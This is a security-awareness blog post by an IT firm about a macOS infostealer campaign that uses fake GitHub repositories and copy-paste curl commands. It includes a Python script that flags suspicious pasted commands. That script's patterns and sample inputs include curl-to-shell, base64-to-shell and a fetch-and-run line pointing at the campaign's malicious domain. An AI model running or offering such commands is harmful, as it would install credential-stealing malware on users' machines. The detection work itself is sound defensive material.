
Widespread Infostealer Campaign Targeting macOS Users

  • alyssa1188
  • Sep 24
  • 2 min read

Updated: 6 days ago


A new wave of malware is making the rounds — and this time, macOS users are in the crosshairs. Security researchers have uncovered a large-scale campaign that uses fake GitHub repositories and brand impersonation to spread infostealer malware like Atomic macOS Stealer (AMOS).

How the Attack Works

Cybercriminals are taking advantage of trusted platforms and well-known brands to trick users into downloading malicious software. Here’s the playbook:

  • Fake GitHub Repos: Attackers set up GitHub pages disguised as legitimate software (e.g., password managers like LastPass, crypto wallets, AI tools).

  • SEO Poisoning: These pages are optimized to appear at the top of search results, luring unsuspecting users.

  • Malicious Redirects: Instead of installing real software, the links send users to rogue websites like macprograms-pro[.]com.

  • Terminal Commands: Victims are prompted to run copy-paste commands (often curl) that secretly download malware.

The end goal? Install AMOS or its variant SHAMOS — malware designed to steal sensitive data like passwords, crypto keys, and personal files.




Why It Works

  • GitHub and brand names like LastPass carry built-in trust.

  • Search engine optimization ensures fake repos are easy to find.

  • Attackers use multiple accounts and naming patterns to avoid quick takedowns.

What You Can Do

  1. Verify before you download: Always confirm that software is from the vendor’s official site or verified GitHub repo.

  2. Be suspicious of copy-paste commands: If a site tells you to run an unfamiliar terminal command, stop and double-check.

  3. Stay patched and protected: Keep macOS up to date and use endpoint security tools.

  4. Educate your teams: Share this info with colleagues — awareness is the best defense.
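The advice in step 2 can be backed by a quick check before anything is pasted into Terminal. The Python sketch below is an added example, not code from the original post or from the researchers it mentions; the function name `review_command`, the rule set, and the sample commands are assumptions constructed for illustration, and the only indicator taken from the article is the defanged domain.

```python
import re

# Domain named in the article; kept defanged here and re-fanged only at runtime.
KNOWN_BAD_HOSTS = {"macprograms-pro[.]com".replace("[.]", ".")}

SHELL = r"(?:sudo\s+)?(?:/bin/)?(?:ba|z)?sh\b"   # sh, bash, zsh, optionally via sudo
FETCH = r"\b(?:curl|wget)\b"

# Heuristics assumed for this example; not a complete rule set.
RULES = [
    ("download piped into a shell",
     re.compile(FETCH + r"[^|;&]*\|\s*" + SHELL)),
    ("download run via command substitution",
     re.compile(SHELL + r"\s+-c\s+[\"']?\s*(?:\$\(|`)\s*" + FETCH)),
    ("base64-decoded text fed to a shell",
     re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b[^;&]*\|\s*" + SHELL)),
]
URL_HOST = re.compile(r"https?://([^/\s\"'|)]+)", re.I)


def review_command(cmd: str) -> list[str]:
    """Return the reasons a pasted command deserves a second look (empty if none)."""
    findings = [reason for reason, rx in RULES if rx.search(cmd)]
    for host in URL_HOST.findall(cmd):
        host = host.lower().split(":")[0]          # drop any :port suffix
        if any(host == bad or host.endswith("." + bad) for bad in KNOWN_BAD_HOSTS):
            findings.append("contacts host named in the campaign report: " + host)
    return findings


if __name__ == "__main__":
    # Constructed sample commands (example.invalid is a reserved placeholder host).
    samples = [
        "curl -fsSL https://example.invalid/install.sh | bash",
        '/bin/bash -c "$(curl -fsSL https://%s/get)"' % next(iter(KNOWN_BAD_HOSTS)),
        "echo aGVsbG8= | base64 -d | sh",
        "curl -O https://example.invalid/tool.dmg",
    ]
    for s in samples:
        print(s, "->", review_command(s) or "no findings")
```

A finding means stop and verify the source, not proof of malware: some legitimate installers use the same download-and-run form.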

macOS is no longer “immune” to malware. Cybercriminals are scaling their campaigns with professional-looking tactics that exploit trust in platforms and brands. Staying cautious and verifying sources is critical to protecting your data.



📞 Looking to strengthen your defenses? Plexus IT offers comprehensive cybersecurity health checks and team training to help you identify and stop risks early. Get in touch with us today!

 
 
 
